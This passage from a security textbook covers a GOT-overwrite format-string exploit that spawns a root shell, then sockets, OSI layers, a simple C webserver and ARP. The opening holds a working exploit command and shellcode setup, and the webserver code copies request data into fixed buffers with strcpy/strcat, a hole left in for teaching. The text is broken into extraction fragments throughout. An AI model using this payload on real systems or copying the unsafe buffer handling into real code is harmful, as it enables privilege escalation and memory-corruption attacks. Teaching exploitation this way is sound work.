 80482d3:       e9 e0 ff ff ff          jmp    80482b8 <_init+0x18>

080482d8 <__libc_start_main@plt>:
 80482d8:       ff 25 78 97 04 08       jmp    *0x8049778
 80482de:       68 08 00 00 00          push   $0x8
 80482e3:       e9 d0 ff ff ff          jmp    80482b8 <_init+0x18>

080482e8 <strcpy@plt>:
 80482e8:       ff 25 7c 97 04 08       jmp    *0x804977c
 80482ee:       68 10 00 00 00          push   $0x10
 80482f3:       e9 c0 ff ff ff          jmp    80482b8 <_init+0x18>

080482f8 <printf@plt>:
 80482f8:       ff 25 80 97 04 08       jmp    *0x8049780
 80482fe:       68 18 00 00 00          push   $0x18
 8048303:       e9 b0 ff ff ff          jmp    80482b8 <_init+0x18>

08048308 <exit@plt>:
 8048308:       ff 25 84 97 04 08       jmp    *0x8049784
 804830e:       68 20 00 00 00          push   $0x20
 8048313:       e9 a0 ff ff ff          jmp    80482b8 <_init+0x18>
reader@hacking:~/booksrc $

One of these jump instructions is associated with the exit() function,
which is called at the end of the program
...
Below,
the procedure linking table is shown to be read only
...
/fmt_vuln | grep -A1 "\
...
plt
00000060 080482b8 080482b8 000002b8 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE

But closer examination of the jump instructions (shown in bold below)
reveals that they aren’t jumping to addresses but to pointers to addresses
...

080482f8 <printf@plt>:
 80482f8:       ff 25 80 97 04 08       jmp    *0x8049780
 80482fe:       68 18 00 00 00          push   $0x18
 8048303:       e9 b0 ff ff ff          jmp    80482b8 <_init+0x18>

08048308 <exit@plt>:
 8048308:       ff 25 84 97 04 08       jmp    *0x8049784
 804830e:       68 20 00 00 00          push   $0x20
 8048313:       e9 a0 ff ff ff          jmp    80482b8 <_init+0x18>

These addresses exist in another section, called the global offset table (GOT),
which is writable
...

reader@hacking:~/booksrc $ objdump -R
...
/fmt_vuln:

file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049764 R_386_GLOB_DAT    __gmon_start__
08049774 R_386_JUMP_SLOT   __gmon_start__
08049778 R_386_JUMP_SLOT   __libc_start_main
0804977c R_386_JUMP_SLOT   strcpy
08049780 R_386_JUMP_SLOT   printf
08049784 R_386_JUMP_SLOT   exit

reader@hacking:~/booksrc $

This reveals that the address of the exit() function (shown in bold above)
is located in the GOT at 0x08049784
...

As usual, the shellcode is put in an environment variable, its actual
location is predicted, and the format string vulnerability is used to write the
value
...
The calculations for the %x format parameters will be done
once again for clarity
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
/fmt_vuln

...
/fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3
...
2#

When fmt_vuln
...
Since
the actual address has been switched with the address for the shellcode in the
environment, a root shell is spawned
...

The ability to overwrite any arbitrary address opens up many possibilities
for exploitation
...


0x400 NETWORKING

Communication and language have greatly enhanced
the abilities of the human race
...
Similarly,
programs can become much more powerful when they have the ability to
communicate with other programs via a network
...

Networking is so prevalent that it is sometimes taken for granted
...
Each of these applications relies on a particular network protocol, but
each protocol uses the same general network transport methods
...
In this chapter you will learn how to network your applications using sockets and how to deal with common network vulnerabilities
...
The structure of this language is described in layers by the OSI model
...
The OSI model is broken down into conceptual
layers of communication
...
The seven OSI layers are as follows:
Physical layer This layer deals with the physical connection between
two points
...
This layer is also responsible for activating, maintaining,
and deactivating these bit-stream communications
...
In contrast with the physical layer, which takes care of sending the raw bits, this layer provides high-level functions, such as error
correction and flow control
...

Network layer This layer works as a middle ground; its primary role is
to pass information between the lower and the higher layers
...

Transport layer This layer provides transparent transfer of data between
systems
...

Session layer This layer is responsible for establishing and maintaining
connections between network applications
...
This allows for
things like encryption and data compression
...

When data is communicated through these protocol layers, it’s sent in
small pieces called packets
...
Starting from the application layer, the packet wraps the presentation layer around that data, which wraps the session layer, which wraps
the transport layer, and so forth
...
Each
wrapped layer contains a header and a body
...
The body of one layer contains the entire package of previously
encapsulated layers, like the skin of an onion or the functional contexts
found on a program’s stack
...
The next layer is the data link layer
...
This
protocol allows for communication between Ethernet ports, but these ports
don’t yet have IP addresses
...
In addition to addressing, this layer is
responsible for moving data from one address to another
...
The next layer is the transport layer, which for web traffic is
TCP; it provides a seamless bidirectional socket connection
...

Other addressing schemes exist at this layer; however, your web traffic
probably uses IP version 4 (IPv4)
...
XX
...
XX
...
Since IPv4 is most common, IP will always
refer to IPv4 in this book
...
When you browse the
Web, the web browser on your network is communicating across the Internet
with the webserver located on a different private network
...
Since the router isn’t concerned with what’s actually in
the packets, it only needs to implement protocols up to the network layer
...
This router then encapsulates this packet with the lower-layer protocol headers needed for the packet to reach its final destination
...

[Figure: OSI layers for an application on Network 1 communicating across the Internet with an application on Network 2]
(7) Application layer
(6) Presentation layer
(5) Session layer
(4) Transport layer
(3) Network layer
(2) Data-link layer
(1) Physical layer


All of this packet encapsulation makes up a complex language that hosts
on the Internet (and other types of networks) use to communicate with each
other
...
Programs that use
networking, such as web browsers and email clients, need to interface with
the operating system which handles the network communications
...

0x420 Sockets
A socket is a standard way to perform network communication through the
OS
...
But these sockets are just a programmer’s
abstraction that takes care of all the nitty-gritty details of the OSI model
described above
...
This data is transmitted at the session layer (5), above
the lower layers (handled by the operating system), which take care of
routing
...
The most common types are stream
sockets and datagram sockets
...
One side initiates the connection to the
other, and after the connection is established, either side can communicate
to the other
...
Stream sockets use a standard communication protocol called Transmission Control Protocol (TCP), which exists on
the transport layer (4) of the OSI model
...
TCP is designed so that the
packets of data will arrive without errors and in sequence, like words
arriving at the other end in the order they were spoken when you are
talking on the telephone
...

Another common type of socket is a datagram socket
...

The connection is one-way only and unreliable
...
The postal service is pretty reliable; the Internet, however, is not
...
UDP stands for User Datagram
Protocol, implying that it can be used to create custom protocols
...
It’s
not a real connection, just a basic method for sending data from one point
to another
...
If your program needs to confirm that a
packet was received by the other side, the other side must be coded to send
back an acknowledgment packet
...


Datagram sockets and UDP are commonly used in networked games and
streaming media, since developers can tailor their communications exactly
as needed without the built-in overhead of TCP
...
Sockets behave so much like files that you can actually use the
read() and write() functions to receive and send data using socket file descriptors
...
These functions have their prototypes defined in /usr/include/
sys/socket
...

socket(int domain, int type, int protocol)

Used to create a new socket, returns a file descriptor for the socket or
-1 on error
...

Returns 0 on success and -1 on error
...

Returns 0 on success and -1 on error
...
Returns 0 on success and -1 on error
...
The address information from the remote host is written into the remote_host structure and
the actual size of the address structure is written into *addr_length
...

send(int fd, void *buffer, size_t n, int flags)
Sends n bytes from *buffer to socket fd; returns the number of bytes sent
or -1 on error
...

When a socket is created with the socket() function, the domain, type,
and protocol of the socket must be specified
...
A socket can be used to communicate using a
variety of protocols, from the standard Internet protocol used when you
browse the Web to amateur radio protocols such as AX
...
These protocol families are defined in bits/socket
...
h
...
h
/* Protocol families
...
*/
#define PF_LOCAL 1 /* Local to host (pipes and file-domain)
...
*/
#define PF_FILE PF_LOCAL /* Another nonstandard name for PF_LOCAL
...
*/
#define PF_AX25 3 /* Amateur Radio AX
...
*/
#define PF_IPX 4 /* Novell Internet Protocol
...
*/
#define PF_NETROM 6 /* Amateur radio NetROM
...
*/
#define PF_ATMPVC 8 /* ATM PVCs
...
25 project
...
*/

...
The types of sockets
are also defined in bits/socket
...
(The /* comments */ in the code above are
just another style that comments out everything between the asterisks
...
h
/* Types of sockets
...
*/
#define SOCK_STREAM SOCK_STREAM
SOCK_DGRAM = 2,
/* Connectionless, unreliable datagrams of fixed maximum length
...

The final argument for the socket() function is the protocol, which should
almost always be 0
...
In practice, however, most protocol families only have one protocol, which means this should usually be set to 0, the first and only protocol
in the enumeration of the family
...

0x422 Socket Addresses
Many of the socket functions reference a sockaddr structure to pass address
information that defines a host
...
h,
as shown on the following page
...
h
/* Get the definition of the macro to define the common sockaddr members
...
h>
/* Structure describing a generic socket address
...

char sa_data[14];
/* Address data
...
h
file, which basically translates to an unsigned short int
...
Since sockets can communicate using a variety of protocol
families, each with their own way of defining endpoint addresses, the definition of an address must also be variable, depending on the address family
...
h; they usually
translate directly to the corresponding protocol families
...
h
/* Address families
...

Since an address can contain different types of information, depending
on the address family, there are several other address structures that contain,
in the address data section, common elements from the sockaddr structure as
well as information specific to the address family
...
This means
that a socket function such as bind() or connect() will simply accept a pointer to a sockaddr structure,
which can in fact point to an address structure for IPv4, IPv6, or X
...
This
allows the socket functions to operate on a variety of protocols
...
The parallel
socket address structure for AF_INET is defined in the netinet/in
...


From /usr/include/netinet/in
...
*/
struct sockaddr_in
{
__SOCKADDR_COMMON (sin_);
in_port_t sin_port;
/* Port number
...
*/
/* Pad to size of 'struct sockaddr'
...
Since
a socket endpoint address consists of an Internet address and a port number,
these are the next two values in the structure
...
The rest of the structure is just 8 bytes of padding to fill out
the rest of the sockaddr structure
...
In the end, the
socket address structures end up looking like this:
sockaddr structure (Generic structure)
   Family | sa_data (14 bytes)

sockaddr_in structure (Used for IP version 4)
   Family | Port # | IP address | Extra padding (8 bytes)

Both structures are the same size
...
This is
the opposite of x86’s little-endian byte ordering, so these values must be converted
...
h and arpa/inet
...
Here
is a summary of these common byte order conversion functions:
htonl(long value)    Host-to-Network Long
Converts a 32-bit integer from the host’s byte order to network byte order

htons(short value)    Host-to-Network Short
Converts a 16-bit integer from the host’s byte order to network byte order

ntohl(long value)    Network-to-Host Long
Converts a 32-bit integer from network byte order to the host’s byte order

ntohs(short value)    Network-to-Host Short
Converts a 16-bit integer from network byte order to the host’s byte order

For compatibility with all architectures, these conversion functions should
still be used even if the host is using a processor with big-endian byte ordering
...
110
...
204, you probably recognize this as an Internet
address (IP version 4)
...
These functions
are defined in the arpa/inet
...

inet_ntoa(struct in_addr network_addr)    Network to ASCII
This function converts the other way
...
This string is held in a statically allocated memory buffer in the
function, so it can be accessed until the next call to inet_ntoa(), when the
string will be overwritten
...
The following
server code listens for TCP connections on port 7890
...
This is done using socket functions and structures from the include
files mentioned earlier, so these files are included at the beginning of the
program
...
h,
which is shown on the following page
...
h
// Dumps raw memory in hex byte and printable split format
void dump(const unsigned char *data_buffer, const unsigned int length) {
   unsigned char byte;
   unsigned int i, j;
   for(i=0; i < length; i++) {
      byte = data_buffer[i];
      printf("%02x ", data_buffer[i]);  // Display byte in hex
...

            byte = data_buffer[j];
            if((byte > 31) && (byte < 127)) // Inside printable char range
               printf("%c", byte);
            else
printf("
...

However, since it is also useful in other places, it has been put into hacking
...
The rest of the server program will be explained as you read the
source code
...
c
#include
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>
"hacking
...
We want
a TCP/IP socket, so the protocol family is PF_INET for IPv4 and the socket type
is SOCK_STREAM for a stream socket
...
This function returns a
socket file descriptor which is stored in sockfd
...
This function call sets the SO_REUSEADDR socket option to true, which will allow it to reuse
a given address for binding
...
If a socket isn’t
closed properly, it may appear to be in use, so this option lets a socket bind to
a port (and take over control of it), even if it seems to be in use
...
Since SO_REUSEADDR is a socket-level option, the level is set to
SOL_SOCKET
...
h
...
A pointer to data and the
length of that data are two arguments that are often used with socket functions
...
The SO_REUSEADDR option uses a 32-bit integer for its
value, so to set this option to true, the final two arguments must be a pointer
to the integer value of 1 and the size of an integer (which is 4 bytes)
...
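The socket creation and option setting described so far can be condensed into one small function. This is only a sketch under the assumptions stated in the comments; the name make_reusable_tcp_socket() is hypothetical, and error handling is reduced to returning -1 instead of calling the book's fatal() function.

```c
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: create an IPv4 stream socket and set SO_REUSEADDR
 * to true. Returns the socket file descriptor, or -1 on failure. */
int make_reusable_tcp_socket(void) {
    int yes = 1;                                   /* the integer value "true" */
    int sockfd = socket(PF_INET, SOCK_STREAM, 0);  /* TCP/IP stream socket */

    if (sockfd == -1)
        return -1;
    /* Socket-level option: pass a pointer to the value and the value's size. */
    if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) {
        close(sockfd);
        return -1;
    }
    return sockfd;
}
```

The option can be read back with getsockopt() using the same level and option name, which is a quick way to confirm that it took effect.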
sin_family = AF_INET;
// Host byte order
host_addr
...
sin_addr
...

memset(&(host_addr
...

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
fatal("binding to socket");
if (listen(sockfd, 5) == -1)
fatal("listening on socket");

These next few lines set up the host_addr structure for use in the bind call
...
The port is set to PORT, which is defined as 7890
...
The address is set to 0, which means it will automatically be filled with
the host’s current IP address
...

The bind() call passes the socket file descriptor, the address structure,
and the length of the address structure
...

N et wor kin g

205

The listen() call tells the socket to listen for incoming connections, and
a subsequent accept() call actually accepts an incoming connection
...
The last argument to the listen() call
sets the maximum size for the backlog queue
...
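The bind() and listen() steps can be sketched together as follows. The helper listen_on_port() is hypothetical and not part of the server program; it also assumes that passing port 0 is acceptable, in which case the kernel picks a free port that can be read back with getsockname().

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: bind a TCP socket to the given port on any local
 * address and start listening. Returns the listening socket (or -1) and
 * stores the port that was actually bound in *bound_port. */
int listen_on_port(unsigned short port, int backlog, unsigned short *bound_port) {
    struct sockaddr_in host_addr;
    socklen_t addr_len = sizeof(host_addr);
    int sockfd = socket(PF_INET, SOCK_STREAM, 0);

    if (sockfd == -1)
        return -1;
    memset(&host_addr, 0, sizeof(host_addr));      /* zero the whole struct */
    host_addr.sin_family = AF_INET;                /* host byte order */
    host_addr.sin_port = htons(port);              /* short, network byte order */
    host_addr.sin_addr.s_addr = htonl(INADDR_ANY); /* address 0: any local IP */

    if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(host_addr)) == -1 ||
        listen(sockfd, backlog) == -1 ||
        getsockname(sockfd, (struct sockaddr *)&host_addr, &addr_len) == -1) {
        close(sockfd);
        return -1;
    }
    *bound_port = ntohs(host_addr.sin_port);       /* back to host byte order */
    return sockfd;
}
```

A call such as listen_on_port(7890, 5, &port) would mirror the values used by the server in this section.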

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
printf("server: got connection from %s port %d\n",
inet_ntoa(client_addr
...
sin_port));
send(new_sockfd, "Hello, world!\n", 14, 0);
recv_length = recv(new_sockfd, &buffer, 1024, 0);
while(recv_length > 0) {
printf("RECV: %d bytes\n", recv_length);
dump(buffer, recv_length);
recv_length = recv(new_sockfd, &buffer, 1024, 0);
}
close(new_sockfd);
}
return 0;
}

Next is a loop that accepts incoming connections
...
This is because the accept() function will write the connecting client’s address information into the address
structure and the size of that structure into sin_size
...
The accept() function returns a new socket file descriptor for the accepted
connection
...

After getting a connection, the program prints out a connection message,
using inet_ntoa() to convert the sin_addr address structure to a dotted-number
IP string and ntohs() to convert the byte order of the sin_port number
...
The final argument for the
send() and recv() functions is a set of flags that, for our purposes, will always be 0
...

The recv() function is given a pointer to a buffer and a maximum length to
read from the socket
...
The loop will continue as
long as the recv() call continues to receive data
...
c
reader@hacking:~/booksrc $
...
out

A telnet client basically works like a generic TCP connection client, so it
can be used to connect to the simple server by specifying the target IP address
and port
...
168
...
248 7890
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
Since telnet is line-buffered, each of these two lines is sent back to the
server when ENTER is pressed
...

On a Local Machine
reader@hacking:~/booksrc $
...
out
server: got connection from 192
...
42
...

RECV: 45 bytes
66 6a 73 67 68 61 75 3b 65 68 67 3b 69 68 73 6b | fjsghau;ehg;ihsk
6a 66 68 61 73 64 6b 66 6a 68 61 73 6b 6a 76 68 | jfhasdkfjhaskjvh
66 64 6b 6a 68 76 62 6b 6a 67 66 0d 0a          | fdkjhvbkjgf
...
However, there are thousands of
different types of servers that accept standard TCP/IP connections
...

This connection transmits the web page over the connection using HTTP,
which defines a certain way to request and send information
...


From /etc/services
finger          79/tcp                          # Finger
finger          79/udp
http            80/tcp          www www-http    # World Wide Web HTTP

HTTP exists in the application layer—the top layer—of the OSI model
...
Many other
application layer protocols also use plaintext, such as POP3, SMTP, IMAP,
and FTP’s control channel
...
Once you know the syntax of these
various protocols, you can manually talk to other programs that speak the
same language
...
In the language of
HTTP, requests are made using the command GET, followed by the resource
path and the HTTP protocol version
...
0 will request
the root document from the webserver using HTTP version 1
...
The request
is actually for the root directory of /, but most webservers will automatically
search for a default HTML document in that directory of index
...
If the
server finds the resource, it will respond using HTTP by sending several
headers before sending the content
...
These headers
are plaintext and can usually provide information about the server
...
0 and pressing ENTER twice
...
internic
...
Then the HTTP application layer is manually
spoken to request the headers for the main index page
...
internic
...
77
...
101
...
internic
...

Escape character is '^]'
...
0
HTTP/1
...
0
...

reader@hacking:~/booksrc $


This reveals that the webserver is Apache version 2
...
52 and even that
the host runs CentOS
...

The next few programs will be sending and receiving a lot of data
...
These functions, called send_string() and recv_line(),
will be added to a new include file called hacking-network
...

The normal send() function returns the number of bytes written, which
isn’t always equal to the number of bytes you tried to send
...
It uses strlen() to figure out the
total length of the string passed to it
...
This is how telnet terminates the lines—it sends
a carriage return and a newline character
...
A quick look at an ASCII table
shows that 0x0D is a carriage return ('\r') and 0x0A is the newline character
('\n')
...

Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
012   10    0A    LF '\n' (new line)          112   74    4A    J
015   13    0D    CR '\r' (carriage ret)      115   77    4D    M
reader@hacking:~/booksrc $

The recv_line() function reads entire lines of data
...
It continues receiving from the socket until it encounters the last two line-termination bytes in sequence
...
These new functions ensure that all bytes are sent and receive data
as lines terminated by '\r\n'
...
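The two ideas just described, looping until every byte is sent and reading one byte at a time until the '\r\n' terminator is seen, can be sketched as follows. These are not the book's send_string() and recv_line() functions; the names send_all_sketch() and recv_line_sketch() are hypothetical, the receive function takes an explicit buffer size, and it returns -1 rather than 0 when no terminator is found. Both of those are assumptions made for this illustration.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define EOL "\r\n"   /* End-of-line byte sequence */
#define EOL_SIZE 2

/* Keep calling send() until the whole null-terminated string is written.
 * Returns 1 on success and 0 on failure. */
int send_all_sketch(int sockfd, const char *buffer) {
    size_t bytes_to_send = strlen(buffer);
    while (bytes_to_send > 0) {
        ssize_t sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
        if (sent_bytes == -1)
            return 0;                       /* send error */
        bytes_to_send -= (size_t)sent_bytes;
        buffer += sent_bytes;               /* skip what was already written */
    }
    return 1;
}

/* Read single bytes until EOL is seen or dest is full. On success the EOL
 * bytes are cut off and the line length is returned; otherwise -1. */
int recv_line_sketch(int sockfd, char *dest, size_t dest_len) {
    size_t used = 0;
    int eol_matched = 0;
    char c;

    while (used + 1 < dest_len && recv(sockfd, &c, 1, 0) == 1) {
        dest[used++] = c;
        if (c == EOL[eol_matched]) {        /* does this byte match terminator? */
            if (++eol_matched == EOL_SIZE) {
                used -= EOL_SIZE;
                dest[used] = '\0';          /* terminate before the EOL bytes */
                return (int)used;
            }
        } else {
            eol_matched = (c == EOL[0]) ? 1 : 0;
        }
    }
    if (dest_len > 0)
        dest[used] = '\0';
    return -1;                              /* no end-of-line sequence found */
}
```

A connected pair of sockets, for example one created with socketpair(), is enough to exercise both functions without a network.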
h
...
h
/* This function accepts a socket FD and a ptr to the null terminated
* string to send
...
Returns 1 on success and 0 on failure
...


bytes_to_send -= sent_bytes;
buffer += sent_bytes;
}
return 1; // Return 1 on success
...
It will receive from the socket until the EOL byte
* sequence is seen
...

* Returns the size of the read line (without EOL bytes)
...

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
eol_matched++;
if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
*(ptr+1-EOL_SIZE) = '\0'; // terminate the string
...

}
return 0; // Didn't find the end-of-line characters
...
In the manual HTTP
HEAD request, the telnet program automatically does a DNS (Domain Name
Service) lookup to determine that www
...
net translates to the IP address
192
...
34
...
DNS is a protocol that allows an IP address to be looked up by a
named address, similar to how a phone number can be looked up in a phone
book if you know the name
...
These functions and structures are defined in netdb
...
A function called gethostbyname() takes a pointer
to a string containing a named address and returns a pointer to a hostent
structure, or a NULL pointer on error
...
Similar to the inet_ntoa() function, the memory for
this structure is statically allocated in the function
...
h
...
h
/* Description of database entry for a single host
...
*/
char **h_aliases;
/* Alias list
...
*/
int h_length;
/* Length of address
...
*/
#define h_addr h_addr_list[0] /* Address, for backward compatibility
...

host_lookup
...
h>
...
h>
...
h>
...
h>
#include "hacking
...
The gethostbyname() function returns a pointer to a hostent structure, which contains the IP address in element h_addr
...
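A minimal sketch of this lookup is shown here. The helper name lookup_ipv4() is hypothetical; it copies the first address out of the statically allocated hostent structure right away, since a later call may overwrite it. As an assumption worth noting, gethostbyname() is an older interface and this sketch only handles IPv4 results.

```c
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <sys/socket.h>

/* Hypothetical helper: resolve a name to its first IPv4 address and write the
 * dotted-number string into out. Returns 1 on success and 0 on failure. */
int lookup_ipv4(const char *name, char *out, size_t out_len) {
    struct hostent *host_info = gethostbyname(name);
    struct in_addr address;

    if (out_len == 0 || host_info == NULL || host_info->h_addrtype != AF_INET)
        return 0;                            /* lookup failed or not IPv4 */
    /* h_addr_list[0] (also known as h_addr) holds the address bytes in
     * network byte order; copy them into an in_addr structure. */
    memcpy(&address, host_info->h_addr_list[0], sizeof(address));
    strncpy(out, inet_ntoa(address), out_len - 1);
    out[out_len - 1] = '\0';
    return 1;
}
```

Passing a string that is already a dotted-number address, such as "127.0.0.1", simply returns that address without a DNS query.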
Sample program
output is shown on the following page
...
c
reader@hacking:~/booksrc $
...
internic
...
internic
...
77
...
101
reader@hacking:~/booksrc $
...
google
...
google
...
125
...
103
reader@hacking:~/booksrc $

Using socket functions to build on this, creating a webserver identification
program isn’t that difficult
...
c
#include
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>
...
h"
#include "hacking-network
...
sin_family = AF_INET;
target_addr
...
sin_addr = *((struct in_addr *)host_info->h_addr);
memset(&(target_addr
...

if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
fatal("connecting to target server");
send_string(sockfd, "HEAD / HTTP/1
...
The target_addr structure’s sin_addr element is filled using the address from the host_info structure
by typecasting and then dereferencing as before (but this time it’s done in a
single line)
...
The strncasecmp() function is a string comparison function from
strings
...
This function compares the first n bytes of two strings, ignoring
capitalization
...
The function will return 0 if
the strings match, so the if statement is searching for the line that starts with
"Server:"
...
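The header test described above can be isolated into a small function. The name server_header_value() is hypothetical; the sketch assumes the header line has already been read into a null-terminated string with its line terminator removed.

```c
#include <stddef.h>
#include <strings.h>

/* Hypothetical helper: if the line starts with "Server:" (in any mix of
 * upper and lower case), return a pointer to the value that follows it.
 * Otherwise return NULL. */
const char *server_header_value(const char *line) {
    if (strncasecmp(line, "Server:", 7) == 0) {  /* 0 means the first 7 bytes match */
        line += 7;                               /* skip past the header name */
        while (*line == ' ')
            line++;                              /* skip leading spaces */
        return line;
    }
    return NULL;
}
```

For a line such as "server: Apache" the function returns a pointer to "Apache", while a line such as "Date: today" yields NULL.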
The following listing shows compilation and
execution of the program
...
c
reader@hacking:~/booksrc $
...
internic
...
internic
...
0
...
/webserver_id www
...
com
The web server for www
...
com is Microsoft-IIS/7
...
After accepting a TCP/IP connection, the
webserver needs to implement further layers of communication using the
HTTP protocol
...
This function handles HTTP GET and HEAD requests that would come from a web browser
...
If the file can’t be found, the server will
respond with a 404 HTTP response
...
The complete source code listing
follows
...
c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>
...
h>
"hacking
...
h"

#define PORT 80
// The port users will be connecting to
#define WEBROOT "
...
sin_family = AF_INET;
//
host_addr
...
sin_addr
...
sin_zero), '\0', 8);

Host byte order
Short, network byte order
// Automatically fill with my IP
...

if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
fatal("binding to socket");
if (listen(sockfd, 20) == -1)
fatal("listening on socket");
while(1) {
// Accept loop
...
The connection is processed as a web request,
* and this function replies over the connected socket
...

*/
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
unsigned char *ptr, request[500], resource[500];
int fd, length;
length = recv_line(sockfd, request);
printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
ptr = strstr(request, " HTTP/"); // Search for valid-looking request
...

printf(" NOT HTTP!\n");
} else {
*ptr = 0; // Terminate the buffer at the end of the URL
...

if(strncmp(request, "GET ", 4) == 0) // GET request
ptr = request+4; // ptr is the URL
...

if(ptr == NULL) { // Then this is not a recognized request
...
html");
// add 'index
...

strcpy(resource, WEBROOT);
// Begin resource with web root path
strcat(resource, ptr);
// and join it with resource path
...

printf("\tOpening \'%s\'\t", resource);
if(fd == -1) { // If file is not found
printf(" 404 Not Found\n");
send_string(sockfd, "HTTP/1
...

printf(" 200 OK\n");
send_string(sockfd, "HTTP/1
...

send(sockfd, ptr, length, 0); // Send it to socket
...

}
close(fd); // Close the file
...

} // End if block for valid request
...

shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully
...
Returns -1 on failure
...
st_size;
}

The handle_connection function uses the strstr() function to look for the
substring HTTP/ in the request buffer
...
The string is
terminated here, and the requests HEAD and GET are recognized as processable
requests
...
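The request parsing just described can be sketched on its own, separate from the file handling. The function parse_request_line() and its return codes are assumptions made for this illustration and do not appear in the tinyweb source; like handle_connection(), it modifies the request buffer in place.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: find " HTTP/" in the request line, terminate the
 * string there, and recognize GET and HEAD requests.
 * Returns 1 for GET, 2 for HEAD, and 0 for anything else.
 * On success *path points at the requested resource inside request. */
int parse_request_line(char *request, char **path) {
    char *ptr = strstr(request, " HTTP/");   /* search for valid-looking request */

    if (ptr == NULL)
        return 0;                            /* not HTTP */
    *ptr = '\0';                             /* terminate at the end of the URL */
    if (strncmp(request, "GET ", 4) == 0) {
        *path = request + 4;
        return 1;
    }
    if (strncmp(request, "HEAD ", 5) == 0) {
        *path = request + 5;
        return 2;
    }
    return 0;                                /* unrecognized request type */
}
```

Given the buffer "GET /index.html HTTP/1.1", the function returns 1 and leaves path pointing at "/index.html".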

The files index
...
jpg have been put into the directory
webroot, as shown in the output below, and then the tinyweb program is
compiled
...
The server’s debugging output shows
the results of a web browser’s request of http://127
...
0
...
jpg
-rw-r--r-- 1 reader reader
261 2007-05-28 23:42 index
...
html

A sample webpage

This is a sample webpage

...
and even a sample image:

...
/webroot/index
...
0
...
1:52997 "GET /image
...
1"
Opening '
...
jpg'
200 OK
Got request from 127
...
0
...
ico HTTP/1
...
/webroot/favicon
...
0
...
1 is a special loopback address that routes to the
local machine
...
html from the webserver, which
in turn requests image
...
In addition, the browser automatically requests
favicon
...
The screenshot below shows the results of this request in a browser
...
At the upper layers of
OSI, many protocols can be plaintext since all the other details of the connection are already taken care of by the lower layers
...

TCP on the transport layer (4) provides reliability and transport control,
while IP on the network layer (3) provides addressing and packet-level
communication
...
At the bottom, the physical layer (1) is simply the wire and
the protocol used to send bits from one device to another
...

This process can be thought of as an intricate interoffice bureaucracy,
reminiscent of the movie Brazil
...

As data packets are transmitted, each receptionist performs the necessary
duties of her particular layer, puts the packet in an interoffice envelope,
writes the header on the outside, and passes it on to the receptionist at the
next layer below
...
Network traffic is a chattering bureaucracy
of servers, clients, and peer-to-peer connections
...
Regardless of
what the packets contain, the protocols used at the lower layers to move the
data from point A to point B are usually the same
...

0x431 Data-Link Layer
The lowest visible layer is the data-link layer
...
This layer provides a way
to address and send messages to anyone else in the office, as well as to figure
out who’s in the office
...
These addresses are known as Media Access Control (MAC) addresses
...
These addresses are also sometimes referred to as hardware
addresses, since each address is unique to a piece of hardware and is stored in
the device’s integrated circuit memory
...

An Ethernet header is 14 bytes in size and contains the source and destination MAC addresses for this Ethernet packet
...

Any Ethernet packet sent to this address will be sent to all the connected
devices
...
The concept of IP addresses doesn’t exist
at this level, only hardware addresses do, so a method is needed to correlate
the two addressing schemes
...
In Ethernet,
the method is known as Address Resolution Protocol (ARP)
...
There are four different types of ARP messages, but
the two most important types are ARP request messages and ARP reply messages
...

This type is used to specify whether the packet is an ARP-type message or an
IP packet
...
” An ARP
reply is the corresponding response that is sent to the requester’s MAC address
(and IP address) saying, “This is my MAC address, and I have this IP address
...
These caches are like the interoffice seating chart
...
10
...
20 and MAC
address 00:00:00:aa:aa:aa, and another system on the same network has
the IP address 10
...
10
...

ARP request
Source MAC: 00:00:00:aa:aa:aa
Dest MAC: ff:ff:ff:ff:ff:ff
“Who has 10
...
10
...
10
...
20
MAC: 00:00:00:aa:aa:aa

Second system
IP: 10
...
10
...
10
...
50 is at 00:00:00:bb:bb:bb
...
10
...
50, the first system will first check its
ARP cache to see if an entry exists for 10
...
10
...
Since this is the first time
these two systems are trying to communicate, there will be no such entry, and
an ARP request will be sent out to the broadcast address, saying, “If you are
10
...
10
...
” Since this request
uses the broadcast address, every system on the network sees the request, but
only the system with the corresponding IP address is meant to respond
...
10
...
50 and I’m at 00:00:00:bb:bb:bb
...


0x432 Network Layer
The network layer is like a worldwide postal service providing an addressing
and delivery method used to send things everywhere
...

Every system on the Internet has an IP address, consisting of a familiar
four-byte arrangement in the form of xx
...
xx
...
The IP header for packets
in this layer is 20 bytes in size (when no options are present) and consists of
various fields and bitflags as defined in RFC 791
...

3
...

SPECIFICATION

Internet Header Format

A summary of the contents of the internet header follows:
 0                   1                   2                   3
